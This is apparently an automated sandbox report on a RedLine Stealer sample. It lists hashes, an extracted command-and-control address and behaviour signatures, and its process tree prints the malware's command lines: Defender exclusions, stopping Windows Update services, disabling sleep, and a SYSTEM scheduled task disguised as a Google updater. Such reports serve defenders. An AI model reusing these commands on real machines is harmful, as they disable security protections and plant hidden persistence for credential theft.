Analysis
-
max time kernel
150s -
max time network
132s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
15-08-2023 23:46
Static task
static1
Behavioral task
behavioral1
Sample
500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe
Resource
win10-20230703-en
General
-
Target
500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe
-
Size
319KB
-
MD5
bab76cbd731821d5b1324e1b51aebb0a
-
SHA1
4c6d0f9087576fe9a49817e91a556ad9d4f7bfe1
-
SHA256
500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71
-
SHA512
1f79942c84cc7453bd34ef148a72d72475509a913f86025d48d86e3bd340f621c678371ed4ae7828875a8fa4ee2578f61202c4683eeaffaefdaa50258051ef19
-
SSDEEP
6144:fZtvL7XGJX5GwKmkMlvsdL32Lb3HFQI7Bk49:fZ9nXGrGw/kNYfHFQI1b9
Malware Config
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
51.83.170.21:19447
-
auth_value
3a050df92d0cf082b2cdaf87863616be
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 4656 created 3336 4656 setup.exe 33 PID 4656 created 3336 4656 setup.exe 33 PID 4656 created 3336 4656 setup.exe 33 PID 4656 created 3336 4656 setup.exe 33 PID 4656 created 3336 4656 setup.exe 33 PID 4500 created 3336 4500 updater.exe 33 PID 4500 created 3336 4500 updater.exe 33 PID 4500 created 3336 4500 updater.exe 33 PID 4500 created 3336 4500 updater.exe 33 -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts updater.exe File created C:\Windows\System32\drivers\etc\hosts setup.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 4540 mi.exe 4656 setup.exe 4500 updater.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000800000001af7c-172.dat themida behavioral1/files/0x000800000001af7c-171.dat themida behavioral1/memory/4656-173-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida behavioral1/memory/4656-174-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida behavioral1/memory/4656-176-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida behavioral1/memory/4656-177-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida behavioral1/memory/4656-178-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida behavioral1/memory/4656-179-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida behavioral1/memory/4656-180-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida behavioral1/memory/4656-181-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida behavioral1/files/0x000800000001af7e-279.dat themida behavioral1/memory/4656-280-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida behavioral1/files/0x000800000001af7e-282.dat themida behavioral1/memory/4500-283-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida behavioral1/memory/4500-285-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida behavioral1/memory/4500-286-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida behavioral1/memory/4500-287-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida behavioral1/memory/4500-288-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida behavioral1/memory/4500-289-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida behavioral1/memory/4500-290-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida behavioral1/memory/4500-291-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida behavioral1/memory/4500-464-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4656 setup.exe 4500 updater.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe setup.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3660 sc.exe 2360 sc.exe 376 sc.exe 4360 sc.exe 2892 sc.exe 4844 sc.exe 1676 sc.exe 508 sc.exe 3628 sc.exe 208 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 2088 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe 2088 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe 2088 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe 4656 setup.exe 4656 setup.exe 4516 powershell.exe 4516 powershell.exe 4516 powershell.exe 4656 setup.exe 4656 setup.exe 4656 setup.exe 4656 setup.exe 4656 setup.exe 4656 setup.exe 4324 powershell.exe 4324 powershell.exe 4324 powershell.exe 4656 setup.exe 4656 setup.exe 4500 updater.exe 4500 updater.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 4500 updater.exe 4500 updater.exe 4500 updater.exe 4500 updater.exe 4500 updater.exe 4500 updater.exe 508 powershell.exe 508 powershell.exe 508 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2088 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeIncreaseQuotaPrivilege 4516 powershell.exe Token: SeSecurityPrivilege 4516 powershell.exe Token: SeTakeOwnershipPrivilege 4516 powershell.exe Token: SeLoadDriverPrivilege 4516 powershell.exe Token: SeSystemProfilePrivilege 4516 powershell.exe Token: SeSystemtimePrivilege 4516 powershell.exe Token: SeProfSingleProcessPrivilege 4516 powershell.exe Token: SeIncBasePriorityPrivilege 4516 powershell.exe Token: SeCreatePagefilePrivilege 4516 powershell.exe Token: SeBackupPrivilege 4516 powershell.exe Token: SeRestorePrivilege 4516 powershell.exe Token: SeShutdownPrivilege 4516 powershell.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeSystemEnvironmentPrivilege 4516 powershell.exe Token: SeRemoteShutdownPrivilege 4516 powershell.exe Token: SeUndockPrivilege 4516 powershell.exe Token: SeManageVolumePrivilege 4516 powershell.exe Token: 33 4516 powershell.exe Token: 34 4516 powershell.exe Token: 35 4516 powershell.exe Token: 36 4516 powershell.exe Token: SeShutdownPrivilege 2084 powercfg.exe Token: SeCreatePagefilePrivilege 2084 powercfg.exe Token: SeShutdownPrivilege 4580 powercfg.exe Token: SeCreatePagefilePrivilege 4580 powercfg.exe Token: SeShutdownPrivilege 3512 powercfg.exe Token: SeCreatePagefilePrivilege 3512 powercfg.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeShutdownPrivilege 792 powercfg.exe Token: SeCreatePagefilePrivilege 792 powercfg.exe Token: SeIncreaseQuotaPrivilege 4324 powershell.exe Token: SeSecurityPrivilege 4324 powershell.exe Token: SeTakeOwnershipPrivilege 4324 powershell.exe Token: SeLoadDriverPrivilege 4324 powershell.exe Token: SeSystemProfilePrivilege 4324 powershell.exe Token: SeSystemtimePrivilege 4324 powershell.exe Token: SeProfSingleProcessPrivilege 4324 powershell.exe Token: SeIncBasePriorityPrivilege 4324 powershell.exe Token: SeCreatePagefilePrivilege 4324 powershell.exe Token: SeBackupPrivilege 4324 powershell.exe Token: SeRestorePrivilege 4324 powershell.exe Token: SeShutdownPrivilege 4324 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeSystemEnvironmentPrivilege 4324 powershell.exe Token: SeRemoteShutdownPrivilege 4324 powershell.exe Token: SeUndockPrivilege 4324 powershell.exe Token: SeManageVolumePrivilege 4324 powershell.exe Token: 33 4324 powershell.exe Token: 34 4324 powershell.exe Token: 35 4324 powershell.exe Token: 36 4324 powershell.exe Token: SeIncreaseQuotaPrivilege 4324 powershell.exe Token: SeSecurityPrivilege 4324 powershell.exe Token: SeTakeOwnershipPrivilege 4324 powershell.exe Token: SeLoadDriverPrivilege 4324 powershell.exe Token: SeSystemProfilePrivilege 4324 powershell.exe Token: SeSystemtimePrivilege 4324 powershell.exe Token: SeProfSingleProcessPrivilege 4324 powershell.exe Token: SeIncBasePriorityPrivilege 4324 powershell.exe Token: SeCreatePagefilePrivilege 4324 powershell.exe Token: SeBackupPrivilege 4324 powershell.exe Token: SeRestorePrivilege 4324 powershell.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2088 wrote to memory of 4540 2088 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe 70 PID 2088 wrote to memory of 4540 2088 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe 70 PID 2088 wrote to memory of 4540 2088 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe 70 PID 4540 wrote to memory of 4656 4540 mi.exe 71 PID 4540 wrote to memory of 4656 4540 mi.exe 71 PID 820 wrote to memory of 508 820 cmd.exe 79 PID 820 wrote to memory of 508 820 cmd.exe 79 PID 820 wrote to memory of 3628 820 cmd.exe 80 PID 820 wrote to memory of 3628 820 cmd.exe 80 PID 820 wrote to memory of 208 820 cmd.exe 81 PID 820 wrote to memory of 208 820 cmd.exe 81 PID 820 wrote to memory of 2892 820 cmd.exe 82 PID 820 wrote to memory of 2892 820 cmd.exe 82 PID 820 wrote to memory of 2360 820 cmd.exe 83 PID 820 wrote to memory of 2360 820 cmd.exe 83 PID 4436 wrote to memory of 2084 4436 cmd.exe 88 PID 4436 wrote to memory of 2084 4436 cmd.exe 88 PID 4436 wrote to memory of 4580 4436 cmd.exe 89 PID 4436 wrote to memory of 4580 4436 cmd.exe 89 PID 4436 wrote to memory of 3512 4436 cmd.exe 90 PID 4436 wrote to memory of 3512 4436 cmd.exe 90 PID 4436 wrote to memory of 792 4436 cmd.exe 91 PID 4436 wrote to memory of 792 4436 cmd.exe 91 PID 4236 wrote to memory of 376 4236 cmd.exe 100 PID 4236 wrote to memory of 376 4236 cmd.exe 100 PID 4236 wrote to memory of 4360 4236 cmd.exe 101 PID 4236 wrote to memory of 4360 4236 cmd.exe 101 PID 4236 wrote to memory of 4844 4236 cmd.exe 102 PID 4236 wrote to memory of 4844 4236 cmd.exe 102 PID 4236 wrote to memory of 1676 4236 cmd.exe 103 PID 4236 wrote to memory of 1676 4236 cmd.exe 103 PID 4236 wrote to memory of 3660 4236 cmd.exe 104 PID 4236 wrote to memory of 3660 4236 cmd.exe 104 PID 360 wrote to memory of 2528 360 cmd.exe 109 PID 360 wrote to memory of 2528 360 cmd.exe 109 PID 360 wrote to memory of 2596 360 cmd.exe 110 PID 360 wrote to memory of 2596 360 cmd.exe 110 PID 360 wrote to memory of 4228 360 cmd.exe 111 PID 360 wrote to memory of 4228 360 cmd.exe 111 PID 360 wrote to memory of 1948 360 cmd.exe 112 PID 360 wrote to memory of 1948 360 cmd.exe 112
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3336
-
C:\Users\Admin\AppData\Local\Temp\500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe"C:\Users\Admin\AppData\Local\Temp\500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\mi.exe"C:\Users\Admin\AppData\Local\Temp\mi.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\Temp\setup.exe"C:\Windows\Temp\setup.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4656
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:508
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3628
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:208
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2892
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2360
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1436
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:376
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4360
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4844
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1676
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3660
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2528
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2596
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4228
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1948
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:508
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4500
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.8MB
MD5bc202c47461acbe8bef80e143eb3a364
SHA10ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA5123bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08
-
Filesize
9.8MB
MD5bc202c47461acbe8bef80e143eb3a364
SHA10ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA5123bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08
-
Filesize
1KB
MD54771fca3c9c78467f3f7219d408bc3a6
SHA19379b3c009731fb7bba5ec74ac394edcdd8c4a19
SHA2566273a4bf14444a0ee427318aa73289c6e0659a42fc9e47bb68c8dc0ea2156ad2
SHA512cadc7f0d47a5be49322343ee31cc958c7427c6472da44c195b32a3b0a7b3d1026f1a47aff7529f443b09e6018e3fd9f1ef4b16656c6149cbc586680810cf7052
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
10.0MB
MD5aba23d7f60f40f4dee64fa440d5db6e6
SHA1dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA2566398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40
-
Filesize
10.0MB
MD5aba23d7f60f40f4dee64fa440d5db6e6
SHA1dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA2566398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40
-
Filesize
3KB
MD52d29fd3ae57f422e2b2121141dc82253
SHA1c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA25680a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68
-
Filesize
9.8MB
MD5bc202c47461acbe8bef80e143eb3a364
SHA10ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA5123bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08
-
Filesize
9.8MB
MD5bc202c47461acbe8bef80e143eb3a364
SHA10ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA5123bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08
-
